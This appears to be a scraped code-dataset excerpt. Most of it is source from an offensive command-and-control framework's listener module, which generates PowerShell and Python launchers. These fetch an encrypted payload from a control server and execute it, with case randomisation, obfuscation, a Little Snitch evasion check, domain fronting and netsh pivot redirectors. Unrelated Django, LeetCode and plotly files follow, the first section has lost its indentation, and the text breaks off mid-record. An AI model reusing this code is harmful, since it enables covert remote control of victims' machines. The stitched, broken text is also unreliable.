listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"session=%s\");\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/template generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module.")
else:
print helpers.color("[!] listeners/template generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
    """
    If you want to support staging for the listener module, generate_stager must be
    implemented to return the stage1 key-negotiation stager code.

    Reads the language-specific stager template from data/agent/stagers/,
    patches in the host, staging key, kill date/working hours and two
    randomized URIs from the comms profile, then returns the result
    base64-encoded, RC4-encrypted (4-byte IV prefixed), or plain.

    NOTE(review): the encrypt branches call os.urandom(), so `os` must be
    imported at module level.
    """
    if not language:
        print helpers.color('[!] listeners/http generate_stager(): no language specified!')
        return None

    profile = listenerOptions['DefaultProfile']['Value']
    uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
    launcher = listenerOptions['Launcher']['Value']
    stagingKey = listenerOptions['StagingKey']['Value']
    workingHours = listenerOptions['WorkingHours']['Value']
    killDate = listenerOptions['KillDate']['Value']
    host = listenerOptions['Host']['Value']
    customHeaders = profile.split('|')[2:]

    # select some random URIs for staging from the main profile
    stage1 = random.choice(uris)
    stage2 = random.choice(uris)

    if language.lower() == 'powershell':
        # read in the stager base
        f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
        stager = f.read()
        f.close()

        # make sure the server ends with "/"
        if not host.endswith("/"):
            host += "/"

        #Patch in custom Headers
        if customHeaders != []:
            headers = ','.join(customHeaders)
            stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")

        #patch in working hours, if any
        if workingHours != "":
            stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)

        #Patch in the killdate, if any
        if killDate != "":
            stager = stager.replace('REPLACE_KILLDATE', killDate)

        # patch the server and key information
        stager = stager.replace('REPLACE_SERVER', host)
        stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
        stager = stager.replace('index.jsp', stage1)
        stager = stager.replace('index.php', stage2)

        randomizedStager = ''

        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                else:
                    randomizedStager += line

        if obfuscate:
            randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # RC4-encrypt with a random 4-byte IV prefixed to the payload
            RC4IV = os.urandom(4)
            return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
        else:
            # otherwise just return the case-randomized stager
            return randomizedStager

    elif language.lower() == 'python':
        # read in the stager base
        f = open("%s/data/agent/stagers/http.py" % (self.mainMenu.installPath))
        stager = f.read()
        f.close()

        stager = helpers.strip_python_comments(stager)

        if host.endswith("/"):
            host = host[0:-1]

        if workingHours != "":
            stager = stager.replace('SET_WORKINGHOURS', workingHours)

        if killDate != "":
            stager = stager.replace('SET_KILLDATE', killDate)

        # # patch the server and key information
        stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
        stager = stager.replace("REPLACE_PROFILE", profile)
        stager = stager.replace("index.jsp", stage1)
        stager = stager.replace("index.php", stage2)

        # # base64 encode the stager and return it
        if encode:
            return base64.b64encode(stager)
        if encrypt:
            # return an encrypted version of the stager ("normal" staging)
            RC4IV = os.urandom(4)
            return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
        else:
            # otherwise return the standard stager
            return stager

    else:
        print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
    """
    Generate just the agent communication code block needed for communications with this listener.
    This is so agents can easily be dynamically updated for the new listener.
    This should be implemented for the module.

    Returns a PowerShell (Get-Task/Send-Message) or Python (send_message)
    code block pointed at this listener's Host value; falls through
    (implicit None) on a missing/invalid language.
    """
    if language:
        if language.lower() == 'powershell':

            # Server list + index consumed by the agent's comms functions.
            updateServers = """
                $Script:ControlServers = @("%s");
                $Script:ServerIndex = 0;
            """ % (listenerOptions['Host']['Value'])

            # For https listeners, accept self-signed certificates.
            if listenerOptions['Host']['Value'].startswith('https'):
                updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"

            getTask = """
                function script:Get-Task {

                    try {
                        if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {

                            # meta 'TASKING_REQUEST' : 4
                            $RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
                            $RoutingCookie = [Convert]::ToBase64String($RoutingPacket)

                            # build the web request object
                            $wc = New-Object System.Net.WebClient

                            # set the proxy settings for the WC to be the default system settings
                            $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
                            $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
                            if($Script:Proxy) {
                                $wc.Proxy = $Script:Proxy;
                            }

                            $wc.Headers.Add("User-Agent",$script:UserAgent)
                            $script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
                            $wc.Headers.Add("Cookie", "session=$RoutingCookie")

                            # choose a random valid URI for checkin
                            $taskURI = $script:TaskURIs | Get-Random
                            $result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
                            $result
                        }
                    }
                    catch [Net.WebException] {
                        $script:MissedCheckins += 1
                        if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
                            # restart key negotiation
                            Start-Negotiate -S "$ser" -SK $SK -UA $ua
                        }
                    }
                }
            """

            sendMessage = """
                function script:Send-Message {
                    param($Packets)

                    if($Packets) {
                        # build and encrypt the response packet
                        $EncBytes = Encrypt-Bytes $Packets

                        # build the top level RC4 "routing packet"
                        # meta 'RESULT_POST' : 5
                        $RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5

                        if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
                            # build the web request object
                            $wc = New-Object System.Net.WebClient

                            # set the proxy settings for the WC to be the default system settings
                            $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
                            $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
                            if($Script:Proxy) {
                                $wc.Proxy = $Script:Proxy;
                            }

                            $wc.Headers.Add('User-Agent', $Script:UserAgent)
                            $Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}

                            try {
                                # get a random posting URI
                                $taskURI = $Script:TaskURIs | Get-Random
                                $response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
                            }
                            catch [System.Net.WebException]{
                                # exception posting data...
                                if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
                                    # restart key negotiation
                                    Start-Negotiate -S "$ser" -SK $SK -UA $ua
                                }
                            }
                        }
                    }
                }
            """

            return updateServers + getTask + sendMessage

        elif language.lower() == 'python':

            # Module-level server global consumed by send_message below.
            updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])

            if listenerOptions['Host']['Value'].startswith('https'):
                updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"

            sendMessage = """
def send_message(packets=None):
    # Requests a tasking or posts data to a randomized tasking URI.
    # If packets == None, the agent GETs a tasking from the control server.
    # If packets != None, the agent encrypts the passed packets and
    #    POSTs the data to the control server.

    global missedCheckins
    global server
    global headers
    global taskURIs

    data = None
    if packets:
        data = ''.join(packets)
        # aes_encrypt_then_hmac is in stager.py
        encData = aes_encrypt_then_hmac(key, data)
        data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
    else:
        # if we're GETing taskings, then build the routing packet to stuff info a cookie first.
        #   meta TASKING_REQUEST = 4
        routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
        b64routingPacket = base64.b64encode(routingPacket)
        headers['Cookie'] = "session=%s" % (b64routingPacket)

    taskURI = random.sample(taskURIs, 1)[0]
    requestUri = server + taskURI

    try:
        data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
        return ('200', data)

    except urllib2.HTTPError as HTTPError:
        # if the server is reached, but returns an erro (like 404)
        missedCheckins = missedCheckins + 1
        #if signaled for restaging, exit.
        if HTTPError.code == 401:
            sys.exit(0)
        return (HTTPError.code, '')

    except urllib2.URLError as URLerror:
        # if the server cannot be reached
        missedCheckins = missedCheckins + 1
        return (URLerror.reason, '')

    return ('', '')
"""
            return updateServers + sendMessage

        else:
            print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
    else:
        print helpers.color('[!] listeners/http generate_comms(): no language specified!')
def start(self, name=''):
    """
    If a server component needs to be started, implement the kick off logic
    here and the actual server code in another function to facilitate threading
    (i.e. start_server() in the http listener).

    For this pivot listener: tasks an elevated PowerShell agent to set up a
    netsh portproxy redirector from its ListenPort to the parent listener's
    host, then registers the pivot as a new listener entry.
    """
    tempOptions = copy.deepcopy(self.options)
    listenerName = self.options['Listener']['Value']
    # validate that the Listener does exist
    if self.mainMenu.listeners.is_listener_valid(listenerName):
        # check if a listener for the agent already exists
        if self.mainMenu.listeners.is_listener_valid(tempOptions['Name']['Value']):
            print helpers.color("[!] Pivot listener already exists on agent %s" % (tempOptions['Name']['Value']))
            return False
        listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
        sessionID = self.mainMenu.agents.get_agent_id_db(tempOptions['Name']['Value'])
        isElevated = self.mainMenu.agents.is_agent_elevated(sessionID)
        # netsh portproxy needs an elevated agent on the pivot host
        if self.mainMenu.agents.is_agent_present(sessionID) and isElevated:
            if self.mainMenu.agents.get_language_db(sessionID).startswith("po"):
                #logic for powershell agents
                # NOTE: the string below is PowerShell source shipped to the
                # agent verbatim; its contents must not be reformatted.
                script = """
function Invoke-Redirector {
param($ListenPort, $ConnectHost, [switch]$Reset, [switch]$ShowAll)
if($ShowAll){
$out = netsh interface portproxy show all
if($out){
$out
}
else{
"[*] no redirectors currently configured"
}
}
elseif($Reset){
$out = netsh interface portproxy reset
if($out){
$out
}
else{
"[+] successfully removed all redirectors"
}
}
else{
if((-not $ListenPort)){
"[!] netsh error: required option not specified"
}
else{
$ConnectAddress = ""
$ConnectPort = ""
$parts = $ConnectHost -split(":")
if($parts.Length -eq 2){
# if the form is http[s]://HOST or HOST:PORT
if($parts[0].StartsWith("http")){
$ConnectAddress = $parts[1] -replace "//",""
if($parts[0] -eq "https"){
$ConnectPort = "443"
}
else{
$ConnectPort = "80"
}
}
else{
$ConnectAddress = $parts[0]
$ConnectPort = $parts[1]
}
}
elseif($parts.Length -eq 3){
# if the form is http[s]://HOST:PORT
$ConnectAddress = $parts[1] -replace "//",""
$ConnectPort = $parts[2]
}
if($ConnectPort -ne ""){
$out = netsh interface portproxy add v4tov4 listenport=$ListenPort connectaddress=$ConnectAddress connectport=$ConnectPort protocol=tcp
if($out){
$out
}
else{
"[+] successfully added redirector on port $ListenPort to $ConnectHost"
}
}
else{
"[!] netsh error: host not in http[s]://HOST:[PORT] format"
}
}
}
}
Invoke-Redirector"""
                script += " -ConnectHost %s" % (listenerOptions['Host']['Value'])
                script += " -ListenPort %s" % (tempOptions['ListenPort']['Value'])
                # clone the existing listener options
                self.options = copy.deepcopy(listenerOptions)
                for option, values in self.options.iteritems():
                    if option.lower() == 'name':
                        # rename the cloned listener after the pivot agent
                        self.options[option]['Value'] = sessionID
                    elif option.lower() == 'host':
                        # repoint the host at the pivot box's internal IP/port
                        if self.options[option]['Value'].startswith('https://'):
                            host = "https://%s:%s" % (tempOptions['internalIP']['Value'], tempOptions['ListenPort']['Value'])
                            self.options[option]['Value'] = host
                        else:
                            host = "http://%s:%s" % (tempOptions['internalIP']['Value'], tempOptions['ListenPort']['Value'])
                            self.options[option]['Value'] = host
                # check to see if there was a host value at all
                # NOTE(review): if 'Host' really is absent this raises
                # KeyError ('Host' is indexed before being created) and
                # 'host' may be unbound -- confirm the intended behaviour.
                if "Host" not in self.options.keys():
                    self.options['Host']['Value'] = host
                self.mainMenu.agents.add_agent_task_db(tempOptions['Name']['Value'], "TASK_SHELL", script)
                msg = "Tasked agent to install Pivot listener "
                self.mainMenu.agents.save_agent_log(tempOptions['Name']['Value'], msg)
                return True
            elif self.mainMenu.agents.get_language_db(self.options['Name']['Value']).startswith('py'):
                # not implemented
                script = """
"""
                print helpers.color("[!] Python pivot listener not implemented")
                return False
            else:
                print helpers.color("[!] Unable to determine the language for the agent")
        else:
            print helpers.color("[!] Agent is not present in the cache")
        return False
def shutdown(self, name=''):
    """
    If a server component was started, implement the logic that kills the particular
    named listener here.

    For this pivot listener: tasks the (elevated) PowerShell agent to reset
    every netsh portproxy redirector it configured.
    """
    if name and name != '':
        print helpers.color("[!] Killing listener '%s'" % (name))
        sessionID = self.mainMenu.agents.get_agent_id_db(name)
        isElevated = self.mainMenu.agents.is_agent_elevated(sessionID)
        if self.mainMenu.agents.is_agent_present(name) and isElevated:
            if self.mainMenu.agents.get_language_db(sessionID).startswith("po"):
                # NOTE: PowerShell source shipped to the agent verbatim;
                # contents must not be reformatted.
                script = """
function Invoke-Redirector {
param($ListenPort, $ConnectHost, [switch]$Reset, [switch]$ShowAll)
if($ShowAll){
$out = netsh interface portproxy show all
if($out){
$out
}
else{
"[*] no redirectors currently configured"
}
}
elseif($Reset){
$out = netsh interface portproxy reset
if($out){
$out
}
else{
"[+] successfully removed all redirectors"
}
}
else{
if((-not $ListenPort)){
"[!] netsh error: required option not specified"
}
else{
$ConnectAddress = ""
$ConnectPort = ""
$parts = $ConnectHost -split(":")
if($parts.Length -eq 2){
# if the form is http[s]://HOST or HOST:PORT
if($parts[0].StartsWith("http")){
$ConnectAddress = $parts[1] -replace "//",""
if($parts[0] -eq "https"){
$ConnectPort = "443"
}
else{
$ConnectPort = "80"
}
}
else{
$ConnectAddress = $parts[0]
$ConnectPort = $parts[1]
}
}
elseif($parts.Length -eq 3){
# if the form is http[s]://HOST:PORT
$ConnectAddress = $parts[1] -replace "//",""
$ConnectPort = $parts[2]
}
if($ConnectPort -ne ""){
$out = netsh interface portproxy add v4tov4 listenport=$ListenPort connectaddress=$ConnectAddress connectport=$ConnectPort protocol=tcp
if($out){
$out
}
else{
"[+] successfully added redirector on port $ListenPort to $ConnectHost"
}
}
else{
"[!] netsh error: host not in http[s]://HOST:[PORT] format"
}
}
}
}
Invoke-Redirector"""
                # -Reset removes *all* portproxy redirectors on the host
                script += " -Reset"
                self.mainMenu.agents.add_agent_task_db(sessionID, "TASK_SHELL", script)
                msg = "Tasked agent to uninstall Pivot listener "
                self.mainMenu.agents.save_agent_log(sessionID, msg)
            elif self.mainMenu.agents.get_language_db(sessionID).startswith("py"):
                print helpers.color("[!] Shutdown not implemented for python")
        else:
            print helpers.color("[!] Agent is not present in the cache or not elevated")
    pass
| 46.94186
| 260
| 0.50197
|
794b24ae713e7d84056524237c695218ae3544ad
| 754
|
py
|
Python
|
grimoirebots/urls.py
|
jjmerchante/grimoirebots
|
afa0a70ecbb169ba49302cc7bc8c6577bebba5ca
|
[
"MIT"
] | 1
|
2022-02-28T11:44:07.000Z
|
2022-02-28T11:44:07.000Z
|
grimoirebots/urls.py
|
jjmerchante/grimoirebots
|
afa0a70ecbb169ba49302cc7bc8c6577bebba5ca
|
[
"MIT"
] | null | null | null |
grimoirebots/urls.py
|
jjmerchante/grimoirebots
|
afa0a70ecbb169ba49302cc7bc8c6577bebba5ca
|
[
"MIT"
] | 1
|
2022-03-09T08:57:15.000Z
|
2022-03-09T08:57:15.000Z
|
"""grimoirebots URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
# Project URL routes: only the Django admin site is exposed.
urlpatterns = [
    path('admin/', admin.site.urls),
]
| 34.272727
| 77
| 0.710875
|
794b2505e1f910557d3cc0cafbffbfe6b781adb9
| 918
|
py
|
Python
|
gevir_website/urls.py
|
gevirank/gevir_website
|
e5b43daa5ed64af7e1bba3d602ed21e43f5bc131
|
[
"MIT"
] | null | null | null |
gevir_website/urls.py
|
gevirank/gevir_website
|
e5b43daa5ed64af7e1bba3d602ed21e43f5bc131
|
[
"MIT"
] | null | null | null |
gevir_website/urls.py
|
gevirank/gevir_website
|
e5b43daa5ed64af7e1bba3d602ed21e43f5bc131
|
[
"MIT"
] | 1
|
2021-05-19T01:41:27.000Z
|
2021-05-19T01:41:27.000Z
|
"""gevir_website URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.conf.urls import include
from gevir import views
# Project URL routes: site index at the root, the gevir app's URLconf
# under 'gevir/', and the Django admin under 'admin/'.
urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^gevir/', include('gevir.urls')),
    url(r'^admin/', admin.site.urls),
]
| 35.307692
| 79
| 0.700436
|
794b25c0debf1e227c7f9bb1beefbc5a82a40a46
| 1,326
|
py
|
Python
|
leetcode/google/tagged/medium/permutation.py
|
alvinctk/google-tech-dev-guide
|
9d7759bea1f44673c2de4f25a94b27368928a59f
|
[
"Apache-2.0"
] | 26
|
2019-06-07T05:29:47.000Z
|
2022-03-19T15:32:27.000Z
|
leetcode/google/tagged/medium/permutation.py
|
alvinctk/google-tech-dev-guide
|
9d7759bea1f44673c2de4f25a94b27368928a59f
|
[
"Apache-2.0"
] | null | null | null |
leetcode/google/tagged/medium/permutation.py
|
alvinctk/google-tech-dev-guide
|
9d7759bea1f44673c2de4f25a94b27368928a59f
|
[
"Apache-2.0"
] | 6
|
2019-10-10T06:39:28.000Z
|
2020-05-12T19:50:55.000Z
|
from typing import List
class Solution:
    def permute(self, nums: List[int]) -> List[List[int]]:
        """Return every permutation of ``nums`` via in-place swap backtracking.

        Time: O(sum of P(N, k) for k=1..N), where P(N, k) = N!/(N-k)! --
        faster than O(N * N!) but slower than O(N!).
        Space: O(N!) for the collected output, plus O(N) recursion depth.
        """
        results: List[List[int]] = []

        def backtrack(first: int) -> None:
            # Everything left of ``first`` is fixed for this branch.
            if first == len(nums):
                results.append(nums.copy())
                return
            for pos in range(first, len(nums)):
                # Place each candidate at ``first``, recurse, then undo.
                nums[first], nums[pos] = nums[pos], nums[first]
                backtrack(first + 1)
                nums[pos], nums[first] = nums[first], nums[pos]

        backtrack(0)
        return results
| 31.571429
| 94
| 0.534691
|
794b26336ef5eeb9b5532069f0e0909079ea6630
| 441
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/surface/contours/y/_end.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 76
|
2020-07-06T14:44:05.000Z
|
2022-02-14T15:30:21.000Z
|
env/lib/python3.8/site-packages/plotly/validators/surface/contours/y/_end.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-08-09T02:30:14.000Z
|
2022-03-12T00:50:14.000Z
|
env/lib/python3.8/site-packages/plotly/validators/surface/contours/y/_end.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-07-12T16:18:07.000Z
|
2022-02-05T16:48:35.000Z
|
import _plotly_utils.basevalidators
class EndValidator(_plotly_utils.basevalidators.NumberValidator):
    # Number validator for the ``surface.contours.y.end`` plotly property.
    def __init__(self, plotly_name="end", parent_name="surface.contours.y", **kwargs):
        # Same defaults as before, just merged into kwargs rather than popped.
        kwargs.setdefault("edit_type", "calc")
        kwargs.setdefault("role", "style")
        super(EndValidator, self).__init__(
            plotly_name=plotly_name, parent_name=parent_name, **kwargs
        )
| 33.923077
| 86
| 0.648526
|
794b26bf2ffc1eb4323aacd654d2351d84033007
| 14,599
|
py
|
Python
|
python/redish_pb2_grpc.py
|
kitchen/redish
|
cb4f1275d9ec3313ed3f12a9dd3be13fb85aae67
|
[
"MIT"
] | null | null | null |
python/redish_pb2_grpc.py
|
kitchen/redish
|
cb4f1275d9ec3313ed3f12a9dd3be13fb85aae67
|
[
"MIT"
] | null | null | null |
python/redish_pb2_grpc.py
|
kitchen/redish
|
cb4f1275d9ec3313ed3f12a9dd3be13fb85aae67
|
[
